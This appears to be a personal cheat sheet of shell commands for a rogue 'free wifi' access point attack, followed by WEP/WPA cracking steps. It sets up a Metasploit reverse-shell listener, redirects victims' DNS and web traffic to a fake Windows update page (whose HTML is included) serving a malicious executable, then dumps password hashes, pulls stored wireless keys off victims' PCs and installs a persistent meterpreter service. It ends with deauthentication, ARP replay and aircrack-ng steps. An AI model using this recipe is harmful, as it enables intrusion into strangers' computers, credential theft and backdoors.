Commands for fake AP
dhclient wlan0 //// Connect to the internet, can be eth0
*****Setup metasploit listener********* ///// you need to create the meterpreter reverse_tcp connection --- information is available in many places https://ift.tt/2ja8bNN
cd /
cd pentest
cd exploits
cd framework3
./msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.0.0.1
set LPORT 55555
show options
exploit
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v ////// can use various commands here
*************************
Transparent Airbase
*************************
su
***************
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 ////router address
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE //// wlan0 = route to the internet
/etc/init.d/dhcp3-server restart // backtrack users use dhcpd
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http' //webserver with fake update page
**********************************************************************
direct any request to apache
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1 //redirector
**********************************************************************
allow traffic again
ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
**************************************************************************
**************************************************************************
**************************************************************************
NON Transparent Airbase
su
***************
modprobe tun
airbase-ng -P -C 30 -e "free wifi" wlan1 -v
su
***************
ifconfig at0 up
ifconfig lo up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
iptables -P FORWARD ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
/etc/init.d/dhcp3-server restart
/etc/init.d/lighttpd stop
lighttpd -D -f '/home/hm/Desktop/http/http'
cd / /// dnspoison available at https://ift.tt/2mCrsaA
cd home
cd hm
cd Desktop
cd dnspoison
java ServerKernelMain 10.0.0.1 10.0.0.1
****************************************************************************
**** Check for victims ********
arp -n -v -i at0
session - l
session -i
sysinfo
getuid
use priv
hashdump
***download keys*****
mkdir c:\\windows\\wkviewer4
cd \
cd windows
cd wkviewer
upload /home/hm/Desktop/http/wkv.exe C:\\windows\\wkviewer4 ///wireless key viewer
upload /home/hm/Desktop/http/wkv.bat C:\\windows\\wkviewer4 /// executes bat script... check below
upload /home/hm/Desktop/http/metsvc-server.exe C:\\windows\\wkviewer4 //meterpreter server
upload /home/hm/Desktop/http/metsrv.dll C:\\windows\\wkviewer4
upload /home/hm/Desktop/http/metsvc.exe C:\\windows\\wkviewer4 //meterpreter server
execute -H -f wkv.bat
cat wkv.txt
download wkv.txt /home/hm/Desktop/http/wkv.txt
misc......
wkv bat file =
wkv.exe /stabular wkv.txt
metsvc.exe install-service
Index html -
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://ift.tt/kkyg93">
<html xmlns="https://ift.tt/lH0Osb">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Untitled Document</title>
<style type="text/css">
<!--
.style2 {
font-family: Arial, Helvetica, sans-serif;
font-weight: bold;
font-size: 24px;
color: #999999;
}
.style3 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
}
.style4 {
font-family: Arial, Helvetica, sans-serif;
color: #666666;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<script src="/AC_RunActiveContent.js" type="text/javascript"></script>
</head>
<body>
<p><img src="/udntitled.jpg" alt="t" width="1275" height="88" /></p>
<p align="center" class="style2">Critical Vulnerability in Windows XP, Vista, Windows 2000 detected. Download and installation of upgrade required. </p>
<p align="center">
<input align="center" type="button" name="Button" value="Download Update" onClick="window.open('/windowsupdate.exe', 'download'); return false;">
</p>
<p align="center" class="style2"></p>
<p> </p>
<form id="form1" name="form1" method="post" action="/upgrade.exe">
<label for="D"></label>
</form>
<p align="left" class="style4"> </p>
</body>
</html>
####################
ifconfig rausb0 up
airodump-ng -w capture -c 6 rausb0
aireplay-ng -O 10 -a <mac access point> -c <mac client> rausb0
-O ->deauthenticate attack
aireplay-nh -3 -b <mac access point> -h <mac client> rausb0
-3 ->arp request
aircrack capture02.cap
##################
aircrack-ng -a 2 filename.cap -w wordlist.lst -b AP:MA:CG:OE:SH:ERE
Note: You must capture full .cap files with airodump-ng (that is, without the --ivs option), not just IVs.
------------------
Have you tried to manually connect to your AP?
iwconfig eth0 essid <whatever your ssid is>
iwconfig eth0 channel <whatever channel your AP is on>
iwconfig eth0 key <whatever the key is> (if you have WEP turned on)
ifconfig eth0 up
Try that, give it a minute or 2 and then run iwconfig again and post your results.
##################